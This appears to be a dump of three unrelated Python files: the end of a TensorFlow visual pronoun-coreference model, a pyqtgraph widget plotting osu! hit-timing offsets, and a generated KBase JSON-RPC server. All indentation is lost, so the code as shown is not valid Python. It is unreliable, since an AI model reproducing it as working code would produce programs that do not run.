span_width_emb = tf.gather(tf.get_variable("span_width_embeddings", [self.config["max_span_width"], self.config["feature_size"]]), span_width_index) # [k, emb]
span_width_emb = tf.nn.dropout(span_width_emb, self.dropout)
span_emb_list.append(span_width_emb)
if self.config["model_heads"]:
with tf.variable_scope("head_scores", reuse=tf.AUTO_REUSE):
span_head_scores = util.projection(context_outputs, 1) # [num_candidates_cap * max_span_width, 1]
span_head_scores = tf.reshape(span_head_scores, [num_candidates, max_span_width, 1])
span_mask = tf.expand_dims(tf.sequence_mask(span_width, max_span_width, dtype=tf.float32), 2) # [k, max_span_width, 1]
span_head_scores += tf.log(span_mask) # [k, max_span_width, 1]
span_attention = tf.nn.softmax(span_head_scores, 1) # [k, max_span_width, 1]
span_head_emb = tf.reduce_sum(span_attention * head_emb, 1) # [k, emb]
span_emb_list.append(span_head_emb)
span_emb = tf.concat(span_emb_list, 1) # [k, emb]
return span_emb # [k, emb]
def get_span_im_emb(self, span_emb, obj_span_emb):
k = util.shape(span_emb, 0)
n = util.shape(obj_span_emb, 0)
with tf.variable_scope("image_attention", reuse=tf.AUTO_REUSE):
# span_emb: [k, emb]
map_dim = self.im_emb_size
with tf.variable_scope("att_projection0"):
text_map = util.projection(span_emb, map_dim) # [k, map_dim]
obj_map = util.projection(obj_span_emb, map_dim) # [k, map_dim]
text_map = tf.nn.relu(text_map)
obj_map = tf.nn.relu(obj_map)
text_map = tf.tile(tf.expand_dims(text_map, 1), [1, n, 1]) # [k, n, map_dim]
obj_map = tf.tile(tf.expand_dims(obj_map, 0), [k, 1, 1]) # [k, n, map_dim]
# interact via element wise map
text_obj_combine = tf.nn.l2_normalize(text_map * obj_map, 2) # [k, n, map_dim]
with tf.variable_scope("get_attention"):
w_att = tf.get_variable('w_att', [map_dim, 1], initializer=tf.contrib.layers.xavier_initializer())
att_grid = tf.reshape(tf.matmul(tf.reshape(text_obj_combine, [-1, map_dim]), w_att), [k, n]) # [k, n]
# softmax
att_grid_soft = tf.nn.softmax(att_grid) # [k, n]
return att_grid_soft # [k, n]
def get_mention_scores(self, span_emb):
with tf.variable_scope("mention_scores"):
return util.ffnn(span_emb, self.config["ffnn_depth"], self.config["ffnn_size"], 1, self.dropout) # [k, 1]
def softmax_loss(self, antecedent_scores, antecedent_labels):
gold_scores = antecedent_scores + tf.log(tf.to_float(antecedent_labels)) # [k, max_ant + 1]
marginalized_gold_scores = tf.reduce_logsumexp(gold_scores, [1]) # [k]
log_norm = tf.reduce_logsumexp(antecedent_scores, [1]) # [k]
return log_norm - marginalized_gold_scores # [k]
def bucket_distance(self, distances):
"""
Places the given values (designed for distances) into 10 semi-logscale buckets:
[0, 1, 2, 3, 4, 5-7, 8-15, 16-31, 32-63, 64+].
"""
logspace_idx = tf.to_int32(tf.floor(tf.log(tf.to_float(distances))/math.log(2))) + 3
use_identity = tf.to_int32(distances <= 4)
combined_idx = use_identity * distances + (1 - use_identity) * logspace_idx
return tf.clip_by_value(combined_idx, 0, 9)
def get_slow_antecedent_scores(self, top_span_emb, top_antecedents, top_antecedent_emb, top_antecedent_offsets, top_span_speaker_ids, im_feat, att_grid=None, has_obj=None):
k = util.shape(top_span_emb, 0)
c = util.shape(top_antecedents, 1)
feature_emb_list = []
if self.config["use_metadata"]:
top_antecedent_speaker_ids = tf.gather(top_span_speaker_ids, top_antecedents) # [k, c]
same_speaker = tf.equal(tf.expand_dims(top_span_speaker_ids, 1), top_antecedent_speaker_ids) # [k, c]
speaker_pair_emb = tf.gather(tf.get_variable("same_speaker_emb", [2, self.config["feature_size"]]), tf.to_int32(same_speaker)) # [k, c, emb]
feature_emb_list.append(speaker_pair_emb)
if self.use_im_fc:
im_emb = tf.expand_dims(im_feat, 0)
im_emb = tf.nn.dropout(im_emb, self.im_dropout)
if self.config["im_layer"] > 0:
for i in range(self.config["im_layer"]):
im_weights = tf.get_variable("im_weights_{}".format(i), [util.shape(im_emb, 1), self.im_fc_emb_size], initializer=None)
im_bias = tf.get_variable("im_bias_{}".format(i), [self.im_fc_emb_size], initializer=None)
im_emb = tf.nn.xw_plus_b(im_emb, im_weights, im_bias)
tiled_im_emb = tf.tile(tf.expand_dims(im_emb, 0), [k, c, 1]) # [k, c, emb]
feature_emb_list.append(tiled_im_emb)
if self.config["use_features"]:
antecedent_distance_buckets = self.bucket_distance(top_antecedent_offsets) # [k, c]
antecedent_distance_emb = tf.gather(tf.get_variable("antecedent_distance_emb", [10, self.config["feature_size"]]), antecedent_distance_buckets) # [k, c]
feature_emb_list.append(antecedent_distance_emb)
feature_emb = tf.concat(feature_emb_list, 2) # [k, c, emb]
feature_emb = tf.nn.dropout(feature_emb, self.dropout) # [k, c, emb]
target_emb = tf.expand_dims(top_span_emb, 1) # [k, 1, emb=1270]
similarity_emb = top_antecedent_emb * target_emb # [k, c, emb]
target_emb = tf.tile(target_emb, [1, c, 1]) # [k, c, emb]
pair_emb = tf.concat([target_emb, top_antecedent_emb, similarity_emb, feature_emb], 2) # [k, c, emb=3850]
with tf.variable_scope("slow_antecedent_scores"):
slow_antecedent_scores = util.ffnn(pair_emb, self.config["ffnn_depth"], self.config["ffnn_size"], 1, self.dropout) # [k, c, 1]
slow_antecedent_scores = tf.squeeze(slow_antecedent_scores, 2) # [k, c]
if self.use_im:
# att max
def zero_att_max(k):
return tf.zeros([k, 1])
def obj_att_max(att_grid):
return tf.reduce_max(att_grid[:, :-1], axis=1, keepdims=True) # [k, 1]
top_span_att_max = tf.cond(has_obj, lambda: obj_att_max(att_grid), lambda: zero_att_max(k)) # [k, 1]
top_antecedent_att_max = tf.gather(top_span_att_max, top_antecedents) # [k, c, 1]
target_att_max = tf.expand_dims(top_span_att_max, 2) # [k, 1, 1]
similarity_emb_att = top_antecedent_att_max * target_att_max # [k, c, 1]
target_emb_att = tf.tile(target_att_max, [1, c, 1]) # [k, c, 1]
# att similarity
top_antecedent_att = tf.gather(att_grid, top_antecedents) # [k, c, n]
top_span_att = tf.expand_dims(att_grid, 1) # [k, 1, n]
def zero_ant_att_max(k, c):
return tf.zeros([k, c, 1])
def obj_ant_att_max(att_grid):
return tf.reduce_max(att_grid[:, :, :-1], axis=2, keepdims=True) # [k, c, 1]
top_span_antecedent_att_max = tf.cond(has_obj, lambda: obj_ant_att_max(top_antecedent_att * top_span_att), lambda: zero_ant_att_max(k, c)) # [k, c, 1]
similarity_emb_att = tf.concat([similarity_emb_att, top_span_antecedent_att_max], 2) # [k, c, 2]
pair_emb_im = tf.concat([target_emb_att, top_antecedent_att_max, similarity_emb_att], 2) # [k, c, 4 (+3n)]
with tf.variable_scope("slow_antecedent_scores_im"):
slow_antecedent_scores_im = util.ffnn(pair_emb_im, self.config["ffnn_depth_im"], self.config["ffnn_size_im"], 1, self.dropout) # [k, c, 1]
slow_antecedent_scores_im = tf.squeeze(slow_antecedent_scores_im, 2) # [k, c]
return slow_antecedent_scores, slow_antecedent_scores_im # [k, c]
return slow_antecedent_scores # [k, c]
def get_fast_antecedent_scores(self, top_span_emb):
with tf.variable_scope("src_projection"):
source_top_span_emb = tf.nn.dropout(util.projection(top_span_emb, util.shape(top_span_emb, -1)), self.dropout) # [k, emb]
target_top_span_emb = tf.nn.dropout(top_span_emb, self.dropout) # [k, emb]
return tf.matmul(source_top_span_emb, target_top_span_emb, transpose_b=True) # [k, k]
def flatten_emb_by_sentence(self, emb, text_len_mask):
num_sentences = tf.shape(emb)[0]
max_sentence_length = tf.shape(emb)[1]
emb_rank = len(emb.get_shape())
if emb_rank == 2:
flattened_emb = tf.reshape(emb, [num_sentences * max_sentence_length])
elif emb_rank == 3:
flattened_emb = tf.reshape(emb, [num_sentences * max_sentence_length, util.shape(emb, 2)])
else:
raise ValueError("Unsupported rank: {}".format(emb_rank))
return tf.boolean_mask(flattened_emb, tf.reshape(text_len_mask, [num_sentences * max_sentence_length]))
def lstm_contextualize(self, text_emb, text_len, text_len_mask=None):
num_sentences = tf.shape(text_emb)[0]
current_inputs = text_emb # [num_sentences, max_sentence_length, emb]
for layer in range(self.config["contextualization_layers"]):
with tf.variable_scope("layer_{}".format(layer), reuse=tf.AUTO_REUSE):
with tf.variable_scope("fw_cell", reuse=tf.AUTO_REUSE):
cell_fw = util.CustomLSTMCell(self.config["contextualization_size"], num_sentences, self.lstm_dropout)
with tf.variable_scope("bw_cell", reuse=tf.AUTO_REUSE):
cell_bw = util.CustomLSTMCell(self.config["contextualization_size"], num_sentences, self.lstm_dropout)
state_fw = tf.contrib.rnn.LSTMStateTuple(tf.tile(cell_fw.initial_state.c, [num_sentences, 1]), tf.tile(cell_fw.initial_state.h, [num_sentences, 1]))
state_bw = tf.contrib.rnn.LSTMStateTuple(tf.tile(cell_bw.initial_state.c, [num_sentences, 1]), tf.tile(cell_bw.initial_state.h, [num_sentences, 1]))
(fw_outputs, bw_outputs), _ = tf.nn.bidirectional_dynamic_rnn(
cell_fw=cell_fw,
cell_bw=cell_bw,
inputs=current_inputs,
sequence_length=text_len,
initial_state_fw=state_fw,
initial_state_bw=state_bw)
text_outputs = tf.concat([fw_outputs, bw_outputs], 2) # [num_sentences, max_sentence_length, emb]
text_outputs = tf.nn.dropout(text_outputs, self.lstm_dropout)
if layer > 0:
highway_gates = tf.sigmoid(util.projection(text_outputs, util.shape(text_outputs, 2))) # [num_sentences, max_sentence_length, emb]
text_outputs = highway_gates * text_outputs + (1 - highway_gates) * current_inputs
current_inputs = text_outputs # [num_sentences, max_sentence_length, emb]
if text_len_mask is None:
return text_outputs
else:
return self.flatten_emb_by_sentence(text_outputs, text_len_mask)
def get_predicted_antecedents(self, antecedents, antecedent_scores):
predicted_antecedents = []
for i, index in enumerate(np.argmax(antecedent_scores, axis=1) - 1):
if index < 0:
predicted_antecedents.append(-1)
else:
predicted_antecedents.append(antecedents[i, index])
return predicted_antecedents
def get_predicted_clusters(self, top_span_starts, top_span_ends, predicted_antecedents):
mention_to_predicted = {}
predicted_clusters = []
for i, predicted_index in enumerate(predicted_antecedents):
if predicted_index < 0:
continue
assert i > predicted_index
predicted_antecedent = (int(top_span_starts[predicted_index]), int(top_span_ends[predicted_index]))
if predicted_antecedent in mention_to_predicted:
predicted_cluster = mention_to_predicted[predicted_antecedent]
else:
predicted_cluster = len(predicted_clusters)
predicted_clusters.append([predicted_antecedent])
mention_to_predicted[predicted_antecedent] = predicted_cluster
mention = (int(top_span_starts[i]), int(top_span_ends[i]))
predicted_clusters[predicted_cluster].append(mention)
mention_to_predicted[mention] = predicted_cluster
predicted_clusters = [tuple(pc) for pc in predicted_clusters]
mention_to_predicted = { m:predicted_clusters[i] for m,i in mention_to_predicted.items() }
return predicted_clusters, mention_to_predicted
def get_predicted_clusters_attention(self, top_span_starts, top_span_ends, att_grid, predicted_antecedents):
mention_to_predicted = {}
predicted_clusters = []
for i, predicted_index in enumerate(predicted_antecedents):
if predicted_index < 0:
continue
assert i > predicted_index
predicted_antecedent = (int(top_span_starts[predicted_index]), int(top_span_ends[predicted_index]))
if predicted_antecedent in mention_to_predicted:
predicted_cluster = mention_to_predicted[predicted_antecedent]
else:
predicted_cluster = len(predicted_clusters)
predicted_clusters.append([predicted_antecedent])
mention_to_predicted[predicted_antecedent] = predicted_cluster
mention = (int(top_span_starts[i]), int(top_span_ends[i]))
predicted_clusters[predicted_cluster].append(mention)
mention_to_predicted[mention] = predicted_cluster
predicted_clusters = [tuple(pc) for pc in predicted_clusters]
mention_to_predicted = { m:predicted_clusters[i] for m,i in mention_to_predicted.items() }
# att_grid is the same order as top_span, extract them for each mention in predicted_clusters
predicted_att_grids = []
for cluster in predicted_clusters:
att_grid_cluster = []
for mention in cluster:
find_mention = False
for index, (start, end) in enumerate(zip(top_span_starts, top_span_ends)):
if mention[0] == start and mention[1] == end:
att_grid_cluster.append(att_grid[index])
find_mention = True
break
if not find_mention:
raise ValueError('antecedent not found in top spans')
predicted_att_grids.append(att_grid_cluster)
return predicted_clusters, predicted_att_grids, mention_to_predicted
def evaluate_coref(self, top_span_starts, top_span_ends, predicted_antecedents, gold_clusters):
gold_clusters = [tuple(tuple(m) for m in gc) for gc in gold_clusters]
mention_to_gold = {}
for gc in gold_clusters:
for mention in gc:
mention_to_gold[mention] = gc
predicted_clusters, mention_to_predicted = self.get_predicted_clusters(top_span_starts, top_span_ends, predicted_antecedents)
return predicted_clusters
def load_eval_data(self):
if self.eval_data is None:
def load_line(line):
example = json.loads(line)
return self.tensorize_example(example, is_training=False), example
with open(self.config["eval_path"]) as f:
self.eval_data = [load_line(l) for l in f.readlines()]
num_words = sum(tensorized_example[2].sum() for tensorized_example, _ in self.eval_data)
print(f"Loaded {len(self.eval_data)} eval examples.")
def evaluate(self, session, official_stdout=False):
self.load_eval_data()
coref_predictions = {}
pr_coref_evaluator = metrics.PrCorefEvaluator()
for example_num, (tensorized_example, example) in enumerate(self.eval_data):
feed_dict = {i:t for i,t in zip(self.input_tensors, tensorized_example)}
outputs = session.run(self.predictions, feed_dict=feed_dict)
candidate_starts, candidate_ends, candidate_mention_scores, top_span_starts, top_span_ends, top_antecedents, top_antecedent_scores, tokens_cdd, tokens_obj, att_grid = outputs
predicted_antecedents = self.get_predicted_antecedents(top_antecedents, top_antecedent_scores)
coref_predictions[example["doc_key"]] = self.evaluate_coref(top_span_starts, top_span_ends, predicted_antecedents, example["clusters"])
pr_coref_evaluator.update(coref_predictions[example["doc_key"]], example["pronoun_info"], example["sentences"], tokens_cdd)
if example_num % 50 == 0:
print(f"Evaluated {example_num + 1}/{len(self.eval_data)} examples.")
summary_dict = {}
pr_coref_results = pr_coref_evaluator.get_prf()
summary_dict["Pronoun Coref average F1 (py)"] = pr_coref_results['f']
print(f"Pronoun Coref average F1 (py): {pr_coref_results['f'] * 100:.2f}%")
summary_dict["Pronoun Coref average precision (py)"] = pr_coref_results['p']
print(f"Pronoun Coref average precision (py): {pr_coref_results['p'] * 100:.2f}%")
summary_dict["Pronoun Coref average recall (py)"] = pr_coref_results['r']
print(f"Pronoun Coref average recall (py): {pr_coref_results['r'] * 100:.2f}%")
summary_dict["Discussed Pronoun Coref average F1 (py)"] = pr_coref_results['f_discussed']
print(f"Discussed Pronoun Coref average F1 (py): {pr_coref_results['f_discussed'] * 100:.2f}%")
summary_dict["Discussed Pronoun Coref average precision (py)"] = pr_coref_results['p_discussed']
print(f"Discussed Pronoun Coref average precision (py): {pr_coref_results['p_discussed'] * 100:.2f}%")
summary_dict["Discussed Pronoun Coref average recall (py)"] = pr_coref_results['r_discussed']
print(f"Discussed Pronoun Coref average recall (py): {pr_coref_results['r_discussed'] * 100:.2f}%")
summary_dict["Not Discussed Pronoun Coref average F1 (py)"] = pr_coref_results['f_not_discussed']
print(f"Not Discussed Pronoun Coref average F1 (py): {pr_coref_results['f_not_discussed'] * 100:.2f}%")
summary_dict["Not Discussed Pronoun Coref average precision (py)"] = pr_coref_results['p_not_discussed']
print(f"Not Discussed Pronoun Coref average precision (py): {pr_coref_results['p_not_discussed'] * 100:.2f}%")
summary_dict["Not Discussed Pronoun Coref average recall (py)"] = pr_coref_results['r_not_discussed']
print(f"Not Discussed Pronoun Coref average recall (py): {pr_coref_results['r_not_discussed'] * 100:.2f}%")
average_f1 = pr_coref_results['f']
max_eval_f1 = tf.maximum(self.max_eval_f1, average_f1)
self.update_max_f1 = tf.assign(self.max_eval_f1, max_eval_f1)
return util.make_summary(summary_dict), average_f1
|
graph_toffset_bpm_inc.py | import pyqtgraph
from pyqtgraph.Qt import QtCore, QtGui
import numpy as np
import threading
from osu_analysis import StdScoreData
from app.data_recording.data import RecData
class GraphTOffsetBPMInc(QtGui.QWidget):
__calc_data_event = QtCore.pyqtSignal(object, object)
def __init__(self, parent=None):
QtGui.QWidget.__init__(self, parent)
self.__avg_data_points = True
# Main graph
self.__graph = pyqtgraph.PlotWidget(title='Avg T-Offset vs BPM Increase')
self.__graph.getPlotItem().getAxis('left').enableAutoSIPrefix(False)
self.__graph.getPlotItem().getAxis('bottom').enableAutoSIPrefix(False)
self.__graph.enableAutoRange(axis='x', enable=False)
self.__graph.enableAutoRange(axis='y', enable=False)
#self.__graph.setLimits(xMin=-10, xMax=5000, yMin=-200, yMax=200)
self.__graph.setRange(xRange=[-10, 300], yRange=[-200, 200])
self.__graph.setLabel('left', 'T-Offset', units='ms', unitPrefix='')
self.__graph.setLabel('bottom', 'Time since last BPM Increase', units='ms', unitPrefix='')
self.__graph.addLegend()
# Used to set text in legend item
self.__label_style = pyqtgraph.PlotDataItem(pen=(0,0,0))
self.__graph.getPlotItem().legend.addItem(self.__label_style, '')
self.__text = self.__graph.getPlotItem().legend.getLabel(self.__label_style)
# Put it all together
self.__layout = QtGui.QHBoxLayout(self)
self.__layout.setContentsMargins(0, 0, 0, 0)
self.__layout.setSpacing(2)
self.__layout.addWidget(self.__graph)
# Connect signals
self.__calc_data_event.connect(self.__display_data)
def plot_data(self, play_data):
# Clear plots for redraw
self.__graph.clearPlots()
self.__text.setText(f'')
if play_data.shape[0] == 0:
return
thread = threading.Thread(target=self.__proc_data, args=(play_data, ))
thread.start()
def __proc_data(self, play_data):
hit_timings_all = np.asarray([])
time_bpm_all = np.asarray([])
unique_timestamps = np.unique(play_data[:, RecData.TIMESTAMP])
for timestamp in unique_timestamps:
data_select = \
(play_data[:, RecData.TIMESTAMP] == timestamp) & \
(play_data[:, RecData.ACT_TYPE] == StdScoreData.ACTION_PRESS)
data = play_data[data_select]
hit_timings = data[:, RecData.T_OFFSETS]
time_bpm_inc = data[:, RecData.DT_DEC]
data_filter = data[:, RecData.HIT_TYPE] == StdScoreData.TYPE_HITP
hit_timings = hit_timings[data_filter]
time_bpm_inc = time_bpm_inc[data_filter]
hit_timings_all = np.insert(hit_timings_all, 0, hit_timings)
time_bpm_all = np.insert(time_bpm_all, 0, time_bpm_inc)
if self.__avg_data_points:
# Average overlapping data points (those that fall on same velocity)
hit_timings_all = np.asarray([ np.sort(hit_timings_all[np.abs(time_bpm_all - time_bpm) < 3]).mean() for time_bpm in np.unique(time_bpm_all) ])
time_bpm_all = np.unique(time_bpm_all)
data_x = time_bpm_all
data_y = hit_timings_all
self.__calc_data_event.emit(data_x, data_y)
def __display_data(self, data_x, data_y):
colors = pyqtgraph.mkBrush(color=[ 255, 0, 0, 150 ])
self.__graph.plot(x=data_x, y=data_y, pen=None, symbol='o', symbolPen=None, symbolSize=5, symbolBrush=colors)
|
annotation_ontology_apiServer.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from wsgiref.simple_server import make_server
import sys
import json
import traceback
import datetime
from multiprocessing import Process
from getopt import getopt, GetoptError
from jsonrpcbase import JSONRPCService, InvalidParamsError, KeywordError,\
JSONRPCError, InvalidRequestError
from jsonrpcbase import ServerError as JSONServerError
from os import environ
from ConfigParser import ConfigParser
from biokbase import log
import requests as _requests
import random as _random
import os
from annotation_ontology_api.authclient import KBaseAuth as _KBaseAuth
DEPLOY = 'KB_DEPLOYMENT_CONFIG'
SERVICE = 'KB_SERVICE_NAME'
AUTH = 'auth-service-url'
# Note that the error fields do not match the 2.0 JSONRPC spec
def get_config_file():
return environ.get(DEPLOY, None)
def get_service_name():
return environ.get(SERVICE, None)
def get_config():
if not get_config_file():
return None
retconfig = {}
config = ConfigParser()
config.read(get_config_file())
for nameval in config.items(get_service_name() or 'annotation_ontology_api'):
retconfig[nameval[0]] = nameval[1]
return retconfig
config = get_config()
from annotation_ontology_api.annotation_ontology_apiImpl import annotation_ontology_api # noqa @IgnorePep8
impl_annotation_ontology_api = annotation_ontology_api(config)
class JSONObjectEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, set):
return list(obj)
if isinstance(obj, frozenset):
return list(obj)
if hasattr(obj, 'toJSONable'):
return obj.toJSONable()
return json.JSONEncoder.default(self, obj)
class JSONRPCServiceCustom(JSONRPCService):
def call(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in a JSON
string or None if there is none.
Arguments:
jsondata -- remote method call in jsonrpc format
"""
result = self.call_py(ctx, jsondata)
if result is not None:
return json.dumps(result, cls=JSONObjectEncoder)
return None
def _call_method(self, ctx, request):
"""Calls given method with given params and returns it value."""
method = self.method_data[request['method']]['method']
params = request['params']
result = None
try:
if isinstance(params, list):
# Does it have enough arguments?
if len(params) < self._man_args(method) - 1:
raise InvalidParamsError('not enough arguments')
# Does it have too many arguments?
if(not self._vargs(method) and len(params) >
self._max_args(method) - 1):
raise InvalidParamsError('too many arguments')
result = method(ctx, *params)
elif isinstance(params, dict):
# Do not accept keyword arguments if the jsonrpc version is
# not >=1.1.
if request['jsonrpc'] < 11:
raise KeywordError
result = method(ctx, **params)
else: # No params
result = method(ctx)
except JSONRPCError:
raise
except Exception as e:
# log.exception('method %s threw an exception' % request['method'])
# Exception was raised inside the method.
newerr = JSONServerError()
newerr.trace = traceback.format_exc()
if isinstance(e.message, basestring):
newerr.data = e.message
else:
# Some exceptions embed other exceptions as the message
newerr.data = repr(e.message)
raise newerr
return result
def call_py(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in python
object format or None if there is none.
This method is same as call() except the return value is a python
object instead of JSON string. This method is mainly only useful for
debugging purposes.
"""
rdata = jsondata
# we already deserialize the json string earlier in the server code, no
# need to do it again
# try:
# rdata = json.loads(jsondata)
# except ValueError:
# raise ParseError
# set some default values for error handling
request = self._get_default_vals()
if isinstance(rdata, dict) and rdata:
# It's a single request.
self._fill_request(request, rdata)
respond = self._handle_request(ctx, request)
# Don't respond to notifications
if respond is None:
return None
return respond
elif isinstance(rdata, list) and rdata:
# It's a batch.
requests = []
responds = []
for rdata_ in rdata:
# set some default values for error handling
request_ = self._get_default_vals()
self._fill_request(request_, rdata_)
requests.append(request_)
for request_ in requests:
respond = self._handle_request(ctx, request_)
# Don't respond to notifications
if respond is not None:
responds.append(respond)
if responds:
return responds
# Nothing to respond.
return None
else:
# empty dict, list or wrong type
raise InvalidRequestError
def _handle_request(self, ctx, request):
"""Handles given request and returns its response."""
if self.method_data[request['method']].has_key('types'): # noqa @IgnorePep8
self._validate_params_types(request['method'], request['params'])
result = self._call_method(ctx, request)
# Do not respond to notifications.
if request['id'] is None:
return None
respond = {}
self._fill_ver(request['jsonrpc'], respond)
respond['result'] = result
respond['id'] = request['id']
return respond
class MethodContext(dict):
def __init__(self, logger):
self['client_ip'] = None
self['user_id'] = None
self['authenticated'] = None
self['token'] = None
self['module'] = None
self['method'] = None
self['call_id'] = None
self['rpc_context'] = None
self['provenance'] = None
self._debug_levels = set([7, 8, 9, 'DEBUG', 'DEBUG2', 'DEBUG3'])
self._logger = logger
def log_err(self, message):
self._log(log.ERR, message)
def log_info(self, message):
self._log(log.INFO, message)
def log_debug(self, message, level=1):
if level in self._debug_levels:
pass
else:
level = int(level)
if level < 1 or level > 3:
raise ValueError("Illegal log level: " + str(level))
level = level + 6
self._log(level, message)
def set_log_level(self, level):
self._logger.set_log_level(level)
def get_log_level(self):
return self._logger.get_log_level()
def clear_log_level(self):
self._logger.clear_user_log_level()
def _log(self, level, message):
self._logger.log_message(level, message, self['client_ip'],
self['user_id'], self['module'],
self['method'], self['call_id'])
def provenance(self):
callbackURL = os.environ.get('SDK_CALLBACK_URL')
if callbackURL:
# OK, there's a callback server from which we can get provenance
arg_hash = {'method': 'CallbackServer.get_provenance',
'params': [],
'version': '1.1',
'id': str(_random.random())[2:]
}
body = json.dumps(arg_hash)
response = _requests.post(callbackURL, data=body,
timeout=60)
response.encoding = 'utf-8'
if response.status_code == 500:
if ('content-type' in response.headers and
response.headers['content-type'] ==
'application/json'):
err = response.json()
if 'error' in err:
raise ServerError(**err['error'])
else:
raise ServerError('Unknown', 0, response.text)
else:
raise ServerError('Unknown', 0, response.text)
if not response.ok:
response.raise_for_status()
resp = response.json()
if 'result' not in resp:
raise ServerError('Unknown', 0,
'An unknown server error occurred')
return resp['result'][0]
else:
return self.get('provenance')
class ServerError(Exception):
'''
The call returned an error. Fields:
name - the name of the error.
code - the error code.
message - a human readable error message.
data - the server side stacktrace.
'''
def __init__(self, name, code, message, data=None, error=None):
super(Exception, self).__init__(message)
self.name = name
self.code = code
self.message = message if message else ''
self.data = data or error or ''
# data = JSON RPC 2.0, error = 1.1
def __str__(self):
return self.name + ': ' + str(self.code) + '. ' + self.message + \
'\n' + self.data
def getIPAddress(environ):
xFF = environ.get('HTTP_X_FORWARDED_FOR')
realIP = environ.get('HTTP_X_REAL_IP')
trustXHeaders = config is None or \
config.get('dont_trust_x_ip_headers') != 'true'
if (trustXHeaders):
if (xFF):
return xFF.split(',')[0].strip()
if (realIP):
return realIP.strip()
return environ.get('REMOTE_ADDR')
class Application(object):
# Wrap the wsgi handler in a class definition so that we can
# do some initialization and avoid regenerating stuff over
# and over
def logcallback(self):
self.serverlog.set_log_file(self.userlog.get_log_file())
def log(self, level, context, message):
self.serverlog.log_message(level, message, context['client_ip'],
context['user_id'], context['module'],
context['method'], context['call_id'])
def __init__(self):
submod = get_service_name() or 'annotation_ontology_api'
self.userlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, changecallback=self.logcallback,
config=get_config_file())
self.serverlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, logfile=self.userlog.get_log_file())
self.serverlog.set_log_level(6)
self.rpc_service = JSONRPCServiceCustom()
self.method_authentication = dict()
self.rpc_service.add(impl_annotation_ontology_api.get_annotation_ontology_events,
name='annotation_ontology_api.get_annotation_ontology_events',
types=[dict])
self.method_authentication['annotation_ontology_api.get_annotation_ontology_events'] = 'optional' # noqa
self.rpc_service.add(impl_annotation_ontology_api.add_annotation_ontology_events,
name='annotation_ontology_api.add_annotation_ontology_events',
types=[dict])
self.method_authentication['annotation_ontology_api.add_annotation_ontology_events'] = 'optional' # noqa
self.rpc_service.add(impl_annotation_ontology_api.status,
name='annotation_ontology_api.status',
types=[dict])
authurl = config.get(AUTH) if config else None
self.auth_client = _KBaseAuth(authurl)
def __call__(self, environ, start_response):
# Context object, equivalent to the perl impl CallContext
ctx = MethodContext(self.userlog)
ctx['client_ip'] = getIPAddress(environ)
status = '500 Internal Server Error'
try:
body_size = int(environ.get('CONTENT_LENGTH', 0))
except (ValueError):
body_size = 0
if environ['REQUEST_METHOD'] == 'OPTIONS':
# we basically do nothing and just return headers
status = '200 OK'
rpc_result = ""
else:
request_body = environ['wsgi.input'].read(body_size)
try:
req = json.loads(request_body)
except ValueError as ve:
err = {'error': {'code': -32700,
'name': "Parse error",
'message': str(ve),
}
}
rpc_result = self.process_error(err, ctx, {'version': '1.1'})
else:
ctx['module'], ctx['method'] = req['method'].split('.')
ctx['call_id'] = req['id']
ctx['rpc_context'] = {
'call_stack': [{'time': self.now_in_utc(),
'method': req['method']}
]
}
prov_action = {'service': ctx['module'],
'method': ctx['method'],
'method_params': req['params']
}
ctx['provenance'] = [prov_action]
try:
token = environ.get('HTTP_AUTHORIZATION')
# parse out the method being requested and check if it
# has an authentication requirement
method_name = req['method']
auth_req = self.method_authentication.get(
method_name, 'none')
if auth_req != 'none':
if token is None and auth_req == 'required':
err = JSONServerError()
err.data = (
'Authentication required for ' +
'annotation_ontology_api ' +
'but no authentication header was passed')
raise err
elif token is None and auth_req == 'optional':
pass
else:
try:
user = self.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
except Exception, e:
if auth_req == 'required':
err = JSONServerError()
err.data = \
"Token validation failed: %s" % e
raise err
if (environ.get('HTTP_X_FORWARDED_FOR')):
self.log(log.INFO, ctx, 'X-Forwarded-For: ' +
environ.get('HTTP_X_FORWARDED_FOR'))
self.log(log.INFO, ctx, 'start method')
rpc_result = self.rpc_service.call(ctx, req)
self.log(log.INFO, ctx, 'end method')
status = '200 OK'
except JSONRPCError as jre:
err = {'error': {'code': jre.code,
'name': jre.message,
'message': jre.data
}
}
trace = jre.trace if hasattr(jre, 'trace') else None
rpc_result = self.process_error(err, ctx, req, trace)
except Exception:
err = {'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error ' +
'occurred',
}
}
rpc_result = self.process_error(err, ctx, req,
traceback.format_exc())
# print 'Request method was %s\n' % environ['REQUEST_METHOD']
# print 'Environment dictionary is:\n%s\n' % pprint.pformat(environ)
# print 'Request body was: %s' % request_body
# print 'Result from the method call is:\n%s\n' % \
# pprint.pformat(rpc_result)
if rpc_result:
response_body = rpc_result
else:
response_body = ''
response_headers = [
('Access-Control-Allow-Origin', '*'),
('Access-Control-Allow-Headers', environ.get(
'HTTP_ACCESS_CONTROL_REQUEST_HEADERS', 'authorization')),
('content-type', 'application/json'),
('content-length', str(len(response_body)))]
start_response(status, response_headers)
return [response_body]
def process_error(self, error, context, request, trace=None):
if trace:
self.log(log.ERR, context, trace.split('\n')[0:-1])
if 'id' in request:
error['id'] = request['id']
if 'version' in request:
error['version'] = request['version']
e = error['error'].get('error')
if not e:
error['error']['error'] = trace
elif 'jsonrpc' in request:
error['jsonrpc'] = request['jsonrpc']
error['error']['data'] = trace
else:
error['version'] = '1.0'
error['error']['error'] = trace
return json.dumps(error)
def now_in_utc(self):
# noqa Taken from http://stackoverflow.com/questions/3401428/how-to-get-an-isoformat-datetime-string-including-the-default-timezone @IgnorePep8
dtnow = datetime.datetime.now()
dtutcnow = datetime.datetime.utcnow()
delta = dtnow - dtutcnow
hh, mm = divmod((delta.days * 24 * 60 * 60 + delta.seconds + 30) // 60,
60)
return "%s%+02d:%02d" % (dtnow.isoformat(), hh, mm)
application = Application()
# This is the uwsgi application dictionary. On startup uwsgi will look
# for this dict and pull its configuration from here.
# This simply lists where to "mount" the application in the URL path
#
# This uwsgi module "magically" appears when running the app within
# uwsgi and is not available otherwise, so wrap an exception handler
# around it
#
